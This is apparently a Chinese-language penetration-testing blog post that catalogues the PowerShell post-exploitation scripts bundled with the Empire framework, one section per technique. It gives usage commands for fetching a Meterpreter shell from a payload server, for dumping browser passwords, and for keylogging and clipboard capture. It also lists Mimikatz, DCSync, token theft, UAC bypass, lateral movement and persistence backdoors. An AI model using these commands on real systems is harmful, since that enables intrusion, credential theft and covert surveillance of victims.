powershell滲透框架

0x01 前言:

對於empire[說實話確實有些老了] 想必大家也都已經不再陌生,很多人說它是神器,嘿嘿……原諒我一直也沒搞清楚神器的具體定義到底是什麼[雖然,我知道這對於實際滲透並沒任何卵用],也許在我有限的認知里,一直都以為只有能在千里之外輕鬆get到目標系統的system或者root許可權的shell的0day才叫神器。

如果動不動就把某個確實好用點兒的腳本或者工具就叫神器,未免有點兒草率,也顯得不穩重,不是嗎,自己有個比較野蠻的習慣,在用別人工具的時候,總是忍不住會觀察,因為想儘可能理解它的內部實現[最好也是最直接的一手學習資料],如果換成是我自己這代碼會怎麼寫呢,雖然是後知後覺,但拓展出來的思路足以讓自己受益良多[站在別人的肩膀上可以走的更快,這是真的],雖然,自己並沒有再把代碼把它實現一遍,但對整個工具架構實現已經有了更清晰的理解和把握,到了實際用的時候自然就不一樣了[更靈活點兒嘛],以後再看到類似的工具,可能一眼就能看透個百分之七八十,嘿嘿……純粹是個人喜好哈,聽過就好,廢話過後,咱們說正題。

今天主要是對empire中一些好用的powershell腳本做些簡要的使用說明,當然啦,自己已經事先把empire中的powershell腳本選擇性的提取了一下,因為我們的重點還是powershell,並非empire腳本本身,整個過程中也不會有任何涉及工具自身使用的東西,其實,empire使用真的非常簡單,命令幫助已經寫的非常詳細了,看看幫助相信大家很快就能上手,不過整個工具最核心的東西還是這些ps腳本[對於一個職業滲透者來講,您應該一開始就盡量朝著你所能理解的本質去,慢慢的,一旦養成這種習慣,同一個東西,你往往能看見別人看不見的一些小細節],因為這中間有很多腳本跟之前是重複的,所以就選擇性的說一些,腳本使用都非常簡單,就不再一一截圖了,實在是好累啊,還是那句話,關鍵是大家能在實際滲透中用上,別的都是扯淡

0x02 執行系統指令的相關模塊[code_execution]:

1、Invoke-DllInjection.ps1向指定進程中注入自定義dll

2、Invoke-ReflectivePEInjection.ps1反射注入 dll

3、Invoke-Shellcode.ps1執行自定義shellcode

1、Invoke-MetasploitPayload.ps1嘗試派生一個meterpreter的shell

2、PS C:> Set-ExecutionPolicy Unrestricted

3、PS C:> Import-Module C:empirecode_executionInvoke-MetasploitPayload.ps1

4、PS C:> Invoke-MetasploitPayload -url http://192.168.3.6:8080/

1、Invoke-ShellcodeMSIL.ps1在powershell進程中執行shellcode,避免觸發win32 api

2、PS C:> Import-Module C:empirecode_executionInvoke-ShellcodeMSIL.ps1

0x03 一些信息搜集模塊[collection],後面的腳本就不一一截圖了[累],大家可以自己根據腳本中的幫助說明進行嘗試:

1、Get-ChromeDump.ps1搜集chrome瀏覽器的http密碼數據,瀏覽歷史等等

2、Get-FoxDump.ps1搜集Firefox瀏覽器的http密碼數據,瀏覽歷史等等

3、Get-BrowserData.ps1搜集所有瀏覽器數據[IE,chrome,firefox],包括書籤,收藏

4、PS C:> Import-Module C:empirecollectionGet-BrowserData.ps1

5、PS C:> Get-BrowserInformation -Browser All -Datatype History -UserName admin

1、Get-ClipboardContents.ps1提前當前機器剪切板中的數據,以秒為單位,默認15秒,實際中並未成功

2、PS C:> Import-Module C:empirecollectionGet-ClipboardContents.ps1

3、PS C:> Invoke -ClipboardMonitor -CollectionLimit 12

1、Get-Keystrokes.ps1實時鍵盤記錄,不太靠譜,經常會漏掉一些字元

2、PS C:> Import-Module C:empirecollectionGet-Keystrokes.ps1

3、PS C:> Get-Keystrokes

0x04 抓各種密碼的方式[credentials]:

1、Get-VaultCredential.ps1從Vault獲取各種密碼

2、Invoke-CredentialInjection.ps1類似wce的hash注入

3、Invoke-Mimikatz.ps1

4、Invoke-PowerDump.ps1

5、Invoke-TokenManipulation.ps1竊取令牌

6、Invoke-DCSync.ps1

0x05 提權[privesc]及bypasuac的各種方法:

1、Invoke-MS16032.ps1可能不太好使

2、Invoke-WScriptBypassUAC.ps1

3、Invoke-BypassUAC.ps1

4、Get-SiteListPassword.ps1

5、Invoke-WScriptBypassUAC.ps1

0x06 各種內網滲透相關模塊 [situational_awareness]:

1、Invoke-SmbScanner.ps1全自動smb弱口令掃描

2、Invoke-Portscan.ps1tcp埠掃描

3、Invoke-ARPScan.ps1內網arp掃描

4、Get-SPN.ps1

5、Invoke-WinEnum.ps1

0x07 橫向滲透[lateral_movement],拓展內網的其它機器:

1、Invoke-PsExec.ps1powershell版的psexecInvoke-

2、SSHCommand.ps1 powershell版本的ssh工具,可以利用它方便的ssh到內網的linux機器上

3 、Invoke-InveighRelay.ps1經典的smb重放攻擊

0x08 持久控制 [persistence]:

1、Install-SSP.ps1

2、Invoke-BackdoorLNK.ps1win快捷方式後門

3、Get-SecurityPackages.ps1

4、PowerBreach.ps1

0x09 一些內網web中間件利用:

1、Exploit-Jenkins.ps1

2、Exploit-JBoss.ps1

文章出處：klion"s blog

你可能喜歡

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！